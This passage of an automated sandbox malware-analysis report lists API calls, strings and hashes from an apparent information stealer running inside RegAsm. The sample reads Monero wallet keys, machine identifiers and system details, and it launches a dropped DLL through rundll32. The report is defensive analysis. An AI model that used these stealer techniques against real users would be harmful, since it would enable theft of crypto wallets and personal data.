Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3529164666-3586502688
Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 0041BC21 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,754074F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,754074F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Strings

e_{7329ea82-0845-4e4c-bd18-02b67ac065cc}_S-1, xrefs: 0041BD36

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID: e_{7329ea82-0845-4e4c-bd18-02b67ac065cc}_S-1
API String ID: 2024441833-2312896130
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

wallet_path, xrefs: 00401A9C
SOFTWARE\monero-project\monero-core, xrefs: 00401A7F

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

C:\Windows\system32\rundll32.exe, xrefs: 00412AE3
C:\ProgramData\, xrefs: 00412995
.dll, xrefs: 004129ED
"" , xrefs: 00412A32

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
